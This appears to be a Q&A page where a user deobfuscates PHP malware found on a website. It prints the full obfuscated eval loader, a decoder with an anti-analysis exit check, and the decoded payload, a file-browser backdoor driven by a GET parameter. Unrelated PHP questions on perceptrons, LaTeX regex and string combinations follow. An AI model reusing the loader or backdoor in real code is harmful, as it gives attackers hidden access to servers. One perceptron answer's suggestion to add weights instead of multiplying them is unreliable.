Deobfuscating some PHP code [closed] - php

This question is unlikely to help any future visitors; it is only relevant to a small geographic area, a specific moment in time, or an extraordinarily narrow situation that is not generally applicable to the worldwide audience of the internet. For help making this question more broadly applicable, visit the help center.
Closed 10 years ago.
I'm trying to deobfuscate this PHP code:
<?php if(!function_exists("TC9A16C47DA8EEE87")){function TC9A16C47DA8EEE87($T059EC46CFE335260){$T059EC46CFE335260=base64_decode($T059EC46CFE335260);$TC9A16C47DA8EEE87=0;$TA7FB8B0A1C0E2E9E=0;$T17D35BB9DF7A47E4=0;$T65CE9F6823D588A7=(ord($T059EC46CFE335260[1])<<8)+ord($T059EC46CFE335260[2]);$TBF14159DC7D007D3=3;$T77605D5F26DD5248=0;$T4A747C3263CA7A55=16;$T7C7E72B89B83E235="";$T0D47BDF6FD9DDE2E=strlen($T059EC46CFE335260);$T43D5686285035C13=__FILE__;$T43D5686285035C13=file_get_contents($T43D5686285035C13);$T6BBC58A3B5B11DC4=0;preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"),$T43D5686285035C13,$T6BBC58A3B5B11DC4);for(;$TBF14159DC7D007D3<$T0D47BDF6FD9DDE2E;){if(count($T6BBC58A3B5B11DC4)) exit;if($T4A747C3263CA7A55==0){$T65CE9F6823D588A7=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$T65CE9F6823D588A7+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);$T4A747C3263CA7A55=16;}if($T65CE9F6823D588A7&0x8000){$TC9A16C47DA8EEE87=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<4);$TC9A16C47DA8EEE87+=(ord($T059EC46CFE335260[$TBF14159DC7D007D3])>>4);if($TC9A16C47DA8EEE87){$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])&0x0F)+3;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T17D35BB9DF7A47E4++)$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4]=$T7C7E72B89B83E235[$T77605D5F26DD5248-$TC9A16C47DA8EEE87+$T17D35BB9DF7A47E4];$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}else{$TA7FB8B0A1C0E2E9E=(ord($T059EC46CFE335260[$TBF14159DC7D007D3++])<<8);$TA7FB8B0A1C0E2E9E+=ord($T059EC46CFE335260[$TBF14159DC7D007D3++])+16;for($T17D35BB9DF7A47E4=0;$T17D35BB9DF7A47E4<$TA7FB8B0A1C0E2E9E;$T7C7E72B89B83E235[$T77605D5F26DD5248+$T17D35BB9DF7A47E4++]=$T059EC46CFE335260[$TBF14159DC7D007D3]);$TBF14159DC7D007D3++;$T77605D5F26DD5248+=$TA7FB8B0A1C0E2E9E;}}else $T7C7E72B89B83E235[$T77605D5F26DD5248++]=$T059EC46CFE335260[$TBF14159DC7D007D3++];$T65CE9F6823D588A7<<=1;$T4A747C3263CA7A55--;if($TBF14159DC7D007D3==$T0D47BDF6FD9DDE2E){$T43D5686285035C13=implode("",$T7C7E72B89B83E235);$T43D5686285035C13="?".">".$T43D5686285035C13;return $T43D5686285035C13;}}}}eval(TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));?>
Now by using a PHP formatter, I managed to make it display cleanly.
<?php
if (!function_exists("TC9A16C47DA8EEE87")) {
function TC9A16C47DA8EEE87($T059EC46CFE335260)
{
$T059EC46CFE335260 = base64_decode($T059EC46CFE335260);
$TC9A16C47DA8EEE87 = 0;
$TA7FB8B0A1C0E2E9E = 0;
$T17D35BB9DF7A47E4 = 0;
$T65CE9F6823D588A7 = (ord($T059EC46CFE335260[1]) << 8) + ord($T059EC46CFE335260[2]);
$TBF14159DC7D007D3 = 3;
$T77605D5F26DD5248 = 0;
$T4A747C3263CA7A55 = 16;
$T7C7E72B89B83E235 = "";
$T0D47BDF6FD9DDE2E = strlen($T059EC46CFE335260);
$T43D5686285035C13 = __FILE__;
$T43D5686285035C13 = file_get_contents($T43D5686285035C13);
$T6BBC58A3B5B11DC4 = 0;
preg_match(base64_decode("LyhwcmludHxzcHJpbnR8ZWNobykv"), $T43D5686285035C13, $T6BBC58A3B5B11DC4);
for (; $TBF14159DC7D007D3 < $T0D47BDF6FD9DDE2E; ) {
if (count($T6BBC58A3B5B11DC4))
exit;
if ($T4A747C3263CA7A55 == 0) {
$T65CE9F6823D588A7 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
$T65CE9F6823D588A7 += ord($T059EC46CFE335260[$TBF14159DC7D007D3++]);
$T4A747C3263CA7A55 = 16;
}
if ($T65CE9F6823D588A7 & 0x8000) {
$TC9A16C47DA8EEE87 = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 4);
$TC9A16C47DA8EEE87 += (ord($T059EC46CFE335260[$TBF14159DC7D007D3]) >> 4);
if ($TC9A16C47DA8EEE87) {
$TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) & 0x0F) + 3;
for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T17D35BB9DF7A47E4++)
$T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4] = $T7C7E72B89B83E235[$T77605D5F26DD5248 - $TC9A16C47DA8EEE87 + $T17D35BB9DF7A47E4];
$T77605D5F26DD5248 += $TA7FB8B0A1C0E2E9E;
} else {
$TA7FB8B0A1C0E2E9E = (ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) << 8);
$TA7FB8B0A1C0E2E9E += ord($T059EC46CFE335260[$TBF14159DC7D007D3++]) + 16;
for ($T17D35BB9DF7A47E4 = 0; $T17D35BB9DF7A47E4 < $TA7FB8B0A1C0E2E9E; $T7C7E72B89B83E235[$T77605D5F26DD5248 + $T17D35BB9DF7A47E4++] = $T059EC46CFE335260[$TBF14159DC7D007D3]);
$TBF14159DC7D007D3++;
$T77605D5F26DD5248 += $TA7FB8B0A1C0E2E9E;
}
} else
$T7C7E72B89B83E235[$T77605D5F26DD5248++] = $T059EC46CFE335260[$TBF14159DC7D007D3++];
$T65CE9F6823D588A7 <<= 1;
$T4A747C3263CA7A55--;
if ($TBF14159DC7D007D3 == $T0D47BDF6FD9DDE2E) {
$T43D5686285035C13 = implode("", $T7C7E72B89B83E235);
$T43D5686285035C13 = "?" . ">" . $T43D5686285035C13;
return $T43D5686285035C13;
}
}
}
}
eval(TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));
?>
Now I want to see the base64 text inside the eval function at the end of the file. By using this tool, I get it to see something, but not accurately.
#��<div class="dere��cha mini">provee�dores v.1.0.3</�>
<h3>P</�`?ph��p PIGUI::CheckI�nc(); ?R4>Crearh 4form id="�_�" action="indexA.?op=<
o $op;�&importa*pi` _" methopost"�� onsubmit="retur$n valid.V�rF (t�his.id)"table�# if(dVers Mayor(��_PS_VERSION_, '1��.5.0')) { $ti��endas = $db->Get�Rows("SELECT _s�hop,�name FROM "�._DB_PREFIX_." �AS s ORDER BYAS8�C"tr>
<td>Tr</�$
�c sizepof(
%) > 1`q <sVelect d
"2i�%Tr��equerido" title=q"#opt�Auto ">�l[TODAS]</
"0ea.�ch 0
Eprintf("<\"%u\">%sv\n",I ['']H']r}#?~/�#�2 QelseP#1t3rs[0]0 ech+C['c�2<input typhidden"+A+
;" 9/>C !�p#A8 #<$Nombred%Ztex6�$="30"�""
$�p 1$ABvo0-
radiɗ(pq="Eve�1"""� o d blabel for1"> Sí</AH0D�/>k<b 0�N#�p]%ce��nter" colspan="27tbr PPS6Aceptaaboto(�#;`)'_SESO[�O'control'/?> T^P�p/VF/ m<RLWSJi�sset($_POST4) &&| <B09 $data9pfes�_prepararDatos4)9Q ^QLy(build�_Inser , Yuppli)8_A $8taux _S_idra� _langarray(8pJ'=>,$aopfigMbM 'descriWb''q a_.Lkeywords|_ { (
")
`uu!t`"hxoq == ^'i2'#o(gt]5shIN�vSERT INTO|NTtR( ,�uR) VALUES(%u, %?u)kq$kHB[`]iqis_numyc.4"s*q?t?w$
?? ,. c%Msg('S(e cdo Xp<- 'c'_� 0
5`dujo alg�+ún error Qno'f~#FGEH#deN`H4" =_#GPG1AExistHi|d `F'sF"DTE F" WHERE'r
0'O{
}'9#�>;_!H#$>>`9"$QY*B"' elimin'_'V7e'_'Pa' '-! Џh4؉uale r^ 3/javacfun`on E
SrV<#){yP$Pdrrm�('¿u Id.'+id+'?')R w�ow.locaTpU /Q$Gp݄;&6�=; }
�0</
#> Rl3ath>4xhs:��<$r$#;R,2,ivLe8_.8$nPsA)2hf�19 g'q% �!i/E` ac#D2 f� �'<a =""e" href="Yj'F:&'.].'p'.7I( (lete.png
P16, ��false, true).'</a>'617e /V8pveed8orߜglobal $�d62`\ � switJcase '&':[$#]trim($3qak�c3 ? '1' : '0'Q=defaultunQc E$ahor1e('Y-m�-d H:i:sp!a['�`e_add'cж#upreturn �M
This is where I'm stuck. How else could this be encoded or compressed?

To decode it, I have removed exit from middle of function, then changed eval to print. Here are the results (code under the eval):
?><div class="derecha mini">explorer v.0.0.4</div>
<h3>Explorer</h3>
<?php
PIGUI::CheckInc();
flush();
if (isset($_GET['loc'])) {
$dir = $_GET['loc'];
if (is_file($dir)) {
$dir = dirname($dir);
$file = basename($dir);
} else {
$file = '';
}
} else {
$dir = getcwd();
$file = '';
}
$dir = ponerBarra($dir);
echo $dir . '<br /><br />';
$dirs = array();
$files = array();
$arr = scandir($dir ? $dir : '.');
sort($arr);
foreach ($arr as $item) {
if ($item != '.') {
if (is_dir($dir . $item)) {
$dirs[] = $item;
} else {
$files[] = $item;
}
}
}
foreach ($dirs as $subdir) {
printf('<img src="%s" alt="" class="middle" /> %s <span class="mini">(%s)</span><br />', $pi_importador, $subdir == '..' ? dirname($dir) : $dir . PIGUI::HtmlEntities($subdir), PIGUI::Icon('folder.png', 16, true, true), $subdir, substr(sprintf('%o', fileperms($dir . $subdir)), -4));
flush();
}
foreach ($files as $file) {
printf('<img src="%s" alt="" class="middle" /> %s <span class="mini">(%s) %.2f Kb</span><br />', PIGUI::Icon('page.png', 16, true, true), $file, substr(sprintf('%o', fileperms($dir . $file)), -4), filesize($dir . $file) / 1024);
flush();
}
?>
EDIT: Here's your original code, mostly deobfuscated. Unfortunately, I don't recognize encryption algorithm:
<?php
function decrypt($source)
{
$file = file_get_contents(__FILE__);
$match = 0;
preg_match("/(print|sprint|echo)/", $file, $match);
// protection against deobfuscation:
// if this file was modified to contain "print", exit
if (count($match)) exit;
$source = base64_decode($source);
$y = (ord($source[1]) << 8) + ord($source[2]);
$z = 0;
$w = 16;
$decrypted = "";
$source_len = strlen($source);
for ($char_no = 3; $char_no < $source_len; ) {
if ($w == 0) {
$y = (ord($source[$char_no++]) << 8);
$y += ord($source[$char_no++]);
$w = 16;
}
if ($y & 0x8000) {
$t = (ord($source[$char_no++]) << 4);
$t += (ord($source[$char_no]) >> 4);
if ($t) {
$x = (ord($source[$char_no++]) & 0x0F) + 3;
for ($i = 0; $i < $x; $i++)
$decrypted[$z + $i] = $decrypted[$z - $t + $i];
$z += $x;
} else {
$x = (ord($source[$char_no++]) << 8);
$x += ord($source[$char_no++]) + 16;
for ($i = 0; $i < $x; )
$decrypted[$z + $i++] = $source[$char_no];
$char_no++;
$z += $x;
}
} else {
$decrypted[$z++] = $source[$char_no++];
}
$y <<= 1;
$w--;
}
return "?" . ">" . implode("", $decrypted);
}
print (decrypt("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+"));
?>

Seems like the original poster wants to see what damage was done to their site after being infected. Valid to ask how to deobfuscate the mess. The whole code is PHP malware. Most likely injected onto a PHP-based website. The whole odd function filled with base64 stuff is the payload. And the weird jumping through hoops is the way the original coder decided to obscure their code. If you truly want to see the output, look at the function at the beginning & the eval at the end: The main function is given the has/odd/garbage name TC9A16C47DA8EEE87. Knowing that, then that last line that should be changed to:
echo TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz0iZGVyZQAAY2hhIG1pbmkiPmV4cGxvcgIgZXIgdi4wACA0PC8CsD4NCjxoEwAzPkUBxDwvANABMD9waHAgIFBJAABHVUk6OkNoZWNrSW5jKCk7QQAgABBmbHVzaADEaWYoaXNzZXQAACgkX0dFVFsnbG9jJ10pKSAgNCB7ApAkZGlyID0gAbkEEiADYl9mDxtpbGUoAkEDAQMZA3BuYW0BxAMhJAKxBKAKHGJhc2UBq30GcGVsc2UAcAciApQnJ/4HA3EB0AAwAfMB4gWQBGBnZXRjd2QMEwWlAxKYAQLQICAJEQJQcG9uZXJCYXJyYQozqAcFASAU0G8CEi4nPGJyIC8+AGMG0gGCbjBzA6ADQXkF4gXSATsgICQCAAJgc2NhbsQRCPAF0iA/IAdiOiAnLicWQXNvchUg0IACkADRZhtAYWNoKAOSYXMgJGl0ZVjYbRYjCRSQAPIgIT0DwhBwCQ6hAYBpc1+x/gYFLgJCFmpzW10IUAGCDaEPoRKDGIMUcQI/CcyMAnAAMCAgCTYGIHMgCUFzdWIAwAlkcHIAAGludGYoJzxhIGhyZWY9ImkEIG5kZXguJTA/b3A9KHUmYW1wOxAHaW1wDsBhZG9yPSVzJmEBICQgALAAACI+PGltZyBzcmM9IiVzIiACAmFsdD0iIi2FbWlkZGxlIhgRLwAYYT4gJXMgPHNwYW4B9y7xKCVzGBwpPC8BgRp1LCAkcGlfBzcBAAuDID2coBPxLicYkAxgJicgOhmSLjCESHRtbEUASG50aXRpZXMoJAOzKSwyZUljbwIAbignZm9sN2AucG5nJywgMTYDkCwgdHJ1ZQBjArADVCwgA9BzdHIoTDVzErUlbwLwF2FwZXJtBdAIcC4C1CkDgBf7LTQpILEJN7cYiwOhGJMAoRh9FK8Urz4Ub0NSgHAUYSAlLjJmIEtiFO0RdA+TcGFnZfzID38P0AvwMJIPXw9fci4Csg80LCAM4XNpesBAQLMBxCAvIDEwMjQRDz8+");
And that will give you the pure base64 of the payload. Past that, not too clear. Maybe further base64 decode? I have faced B.S. like this before & it’s never pleasant. If you are truly fearful, decode this on a safe machine that you don't mind getting hosed in the process. But my guess is this is mainly just a vandalism piece of malware & not something that is mining for secrets deeper than how to cause basic vandalism.

It's not really important to understand the cryptic transformations in the TC9A16C47DA8EEE87. The purpose of this method is to generate executable PHP code from an input string (base64 encoded) that is then passed to eval.
Instead of trying to decode the input string, you could try to just print the return value of TC9A16C47DA8EEE87("QAAAPGRpdiBjbGFzcz..., by using echo instead of eval.

Related

Basic perceptron for AND gate in PHP, am I doing it right? Weird results

I'd like to learn about neural nets starting with the very basic perceptron algorithm. So I've implemented one in PHP and I'm getting weird results after training it. All the 4 possible input combinations return either wrong or correct results (more often the wrong ones).
1) Is there something wrong with my implementation or the results I'm getting are normal?
2) Can this kind of implementation work with more than 2 inputs?
3) What would be the next (easiest) step in learning neural nets after this? Maybe adding more neurons, changing the activation function, or ...?
P.S. I'm pretty bad at math and don't necessarily understand the math behind perceptron 100%, at least not the training part.
Perceptron Class
<?php
namespace Perceptron;
class Perceptron
{
// Number of inputs
protected $n;
protected $weights = [];
protected $bias;
public function __construct(int $n)
{
$this->n = $n;
// Generate random weights for each input
for ($i = 0; $i < $n; $i++) {
$w = mt_rand(-100, 100) / 100;
array_push($this->weights, $w);
}
// Generate a random bias
$this->bias = mt_rand(-100, 100) / 100;
}
public function sum(array $inputs)
{
$sum = 0;
for ($i = 0; $i < $this->n; $i++) {
$sum += ($inputs[$i] * $this->weights[$i]);
}
return $sum + $this->bias;
}
public function activationFunction(float $sum)
{
return $sum < 0.0 ? 0 : 1;
}
public function predict(array $inputs)
{
$sum = $this->sum($inputs);
return $this->activationFunction($sum);
}
public function train(array $trainingSet, float $learningRate)
{
foreach ($trainingSet as $row) {
$inputs = array_slice($row, 0, $this->n);
$correctOutput = $row[$this->n];
$output = $this->predict($inputs);
$error = $correctOutput - $output;
// Adjusting the weights
$this->weights[0] = $this->weights[0] + ($learningRate * $error);
for ($i = 0; $i < $this->n - 1; $i++) {
$this->weights[$i + 1] =
$this->weights[$i] + ($learningRate * $inputs[$i] * $error);
}
}
// Adjusting the bias
$this->bias += ($learningRate * $error);
}
}
Main File
<?php
require_once 'vendor/autoload.php';
use Perceptron\Perceptron;
// Create a new perceptron with 2 inputs
$perceptron = new Perceptron(2);
// Test the perceptron
echo "Before training:\n";
$output = $perceptron->predict([0, 0]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([0, 1]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([1, 0]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([1, 1]);
echo "{$output} - " . ($output == 1 ? 'correct' : 'nope') . "\n";
// Train the perceptron
$trainingSet = [
// The 3rd column is the correct output
[0, 0, 0],
[0, 1, 0],
[1, 0, 0],
[1, 1, 1],
];
for ($i = 0; $i < 1000; $i++) {
$perceptron->train($trainingSet, 0.1);
}
// Test the perceptron again - now the results should be correct
echo "\nAfter training:\n";
$output = $perceptron->predict([0, 0]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([0, 1]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([1, 0]);
echo "{$output} - " . ($output == 0 ? 'correct' : 'nope') . "\n";
$output = $perceptron->predict([1, 1]);
echo "{$output} - " . ($output == 1 ? 'correct' : 'nope') . "\n";
I must thank you for posting this question, I have wanted a chance to dive a little deeper into neural networks. Anyway, down to business. After tinkering around and verbose logging what all is happening, it ended up only requiring 1 character change to work as intended:
public function sum(array $inputs)
{
...
//instead of multiplying the input by the weight, we should be adding the weight
$sum += ($inputs[$i] + $this->weights[$i]);
...
}
With that change, 1000 iterations of training ends up being overkill.
One bit of the code was confusing, different setting of weights:
public function train(array $trainingSet, float $learningRate)
{
foreach ($trainingSet as $row) {
...
$this->weights[0] = $this->weights[0] + ($learningRate * $error);
for ($i = 0; $i < $this->n - 1; $i++) {
$this->weights[$i + 1] =
$this->weights[$i] + ($learningRate * $inputs[$i] * $error);
}
}
I don't necessarily understand why you chose to do it this way. My unexperienced eye would think that the following would work as well.
for ($i = 0; $i < $this->n; $i++) {
$this->weight[$i] += $learningRate * $error;
}
Found my silly mistake, I wasn't adjusting the bias for each row of a training set as I accidentally put it outside the foreach loop. This is what the train() method should look like:
public function train(array $trainingSet, float $learningRate)
{
foreach ($trainingSet as $row) {
$inputs = array_slice($row, 0, $this->n);
$correctOutput = $row[$this->n];
$output = $this->predict($inputs);
$error = $correctOutput - $output;
// Adjusting the weights
for ($i = 0; $i < $this->n; $i++) {
$this->weights[$i] += ($learningRate * $inputs[$i] * $error);
}
// Adjusting the bias
$this->bias += ($learningRate * $error);
}
}
Now I get the correct results after training each time I run the script. Just 100 epochs of training is enough.

PHP - latex format of function with regex

Is it possible to write a regex which would take input like 'sqrt(2 * (2+2)) + sin(pi/6)' and transform it into '\sqrt{2 \cdot (2+2)} + \sin(\pi/6)'?
The problem is the 'sqrt' and parentheses in it. It is obvious I can't simply use something like this:
/sqrt\((.?)\)/ -> \\sqrt{$1}
because this code would create something like this '\sqrt{2 \cdot (2+2)) + \sin(\pi/6}'.
My solution: it simply go throw the string converted to char array and tests if a current substring starts with $latex, if it does second for-cycle go from this point in different direction and by parentheses decides where the function starts and ends. (startsWith function)
Code:
public static function formatFunction($function, $latex, $input) {
$input = preg_replace("/" . $function . "\(/", $latex . "{", $input);
$arr = str_split($input);
$inGap = false;
$gap = 0;
for ($i = count($arr) - 1; $i >= 0; $i--) {
if (startsWith(substr($input, $i), $latex)) {
for ($x = $i; $x < count($arr); $x++) {
if ($arr[$x] == "(" || $arr[$x] == "{") { $gap++; $inGap = true; }
else if ($arr[$x] == ")" || $arr[$x] == "}") { $gap--; }
if ($inGap && $gap == 0) {
$arr[$x] = "}";
$inGap = false;
break;
}
}
}
$gap = 0;
}
return implode($arr);
}
Use:
self::formatFunction("sqrt", "\\sqrt",
"sqrt(25 + sqrt(16 - sqrt(49)) + (7 + 1)) + sin(pi/2)");
Output:
\sqrt{25+\sqrt{16-\sqrt{49}}+(7+1)}+\sin (\pi/2)
Note: sin and pi aren't formated by this code, it's only str_replace function...
In general, no regular expression can effectively handle nested parentheses. Sorry to be the bearer of bad news! The MathJAX parser library can interpret LaTeX equations and you could probably add a custom output routine to do what you want.
For TeX questions, you can also try http://tex.stackexchange.com .
Some time ago i soved a similar problem in such way. Maybe it will be helpful for you
$str = 'sqrt((2 * (2+2)) + sin(pi/(6+7)))';
$from = []; // parentheses content
$to = []; // patterns for replace #<number>
$brackets = [['(', ')'], ['{', '}'], ['[', ']']]; // new parentheses for every level
$level = 0;
$count = 1; // count or replace made
while($count) {
$str = preg_replace_callback('(\(([^()]+)\))',
function ($m) use (&$to, &$from, $brackets, $level) {
array_unshift($to, $brackets[$level][0] . $m[1] . $brackets[$level][1]);
$i = '#' . (count($to)-1); // pattern for future replace.
// here it '#1', '#2'.
// Make it so they will be unique
array_unshift($from, $i);
return $i; }, $str, -1, $count);
$level++;
}
echo str_replace($from, $to, $str); // return content back
// sqrt[{2 * (2+2)} + sin{pi/(6+7)}]
I forgot all details, but it, seems, works

Rewrite a large number of for loops into something shorter

I have the following code:
for($a=1; $a<strlen($string); $a++){
for($b=1; $a+$b<strlen($string); $b++){
for($c=1; $a+$b+$c<strlen($string); $c++){
for($d=1; $a+$b+$c+$d<strlen($string); $d++){
$tempString = substr_replace($string, ".", $a, 0);
$tempString = substr_replace($tempString, ".", $a+$b+1, 0);
$tempString = substr_replace($tempString, ".", $a+$b+$c+2, 0);
$tempString = substr_replace($tempString, ".", $a+$b+$c+$d+3, 0);
echo $tempString."</br>";
}
}
}
}
What it does is to make all possible combinatons of a string with several dots.
Example:
t.est123
te.st123
tes.t123
...
test12.3
Then, I add one more dot:
t.e.st123
t.es.t123
...
test1.2.3
Doing the way I'm doing now, I need to create lots and lots of for loops, each for a determined number of dots. I don't know how I can turn that example into a functon or other easier way of doing this.
Your problem is a combination problem. Note: I'm not a math freak, I only researched this information because of interest.
http://en.wikipedia.org/wiki/Combination#Number_of_k-combinations
Also known as n choose k. The Binomial coefficient is a function which gives you the number of combinations.
A function I found here: Calculate value of n choose k
function choose($n, $k) {
if ($k == 0) {return 1;}
return($n * choose($n - 1, $k - 1)) / $k;
}
// 6 positions between characters (test123), 4 dots
echo choose(6, 4); // 15 combinations
To get all combinations you also have to choose between different algorithms.
Good post: https://stackoverflow.com/a/127856/1948627
UPDATE:
I found a site with an algorithm in different programming languages. (But not PHP)
I've converted it to PHP:
function bitprint($u){
$s= [];
for($n= 0;$u > 0;++$n, $u>>= 1) {
if(($u & 1) > 0) $s[] = $n;
}
return $s;
}
function bitcount($u){
for($n= 0;$u > 0;++$n, $u&= ($u - 1));
return $n;
}
function comb($c, $n){
$s= [];
for($u= 0;$u < 1 << $n;$u++) {
if(bitcount($u) == $c) $s[] = bitprint($u);
}
return $s;
}
echo '<pre>';
print_r(comb(4, 6));
It outputs an array with all combinations (positions between the chars).
The next step is to replace the string with the dots:
$string = 'test123';
$sign = '.';
$combs = comb(4, 6);
// get all combinations (Th3lmuu90)
/*
$combs = [];
for($i=0; $i<strlen($string); $i++){
$combs = array_merge($combs, comb($i, strlen($string)-1));
}
*/
foreach ($combs as $comb) {
$a = $string;
for ($i = count($comb) - 1; $i >= 0; $i--) {
$a = substr_replace($a, $sign, $comb[$i] + 1, 0);
}
echo $a.'<br>';
}
// output:
t.e.s.t.123
t.e.s.t1.23
t.e.st.1.23
t.es.t.1.23
te.s.t.1.23
t.e.s.t12.3
t.e.st.12.3
t.es.t.12.3
te.s.t.12.3
t.e.st1.2.3
t.es.t1.2.3
te.s.t1.2.3
t.est.1.2.3
te.st.1.2.3
tes.t.1.2.3
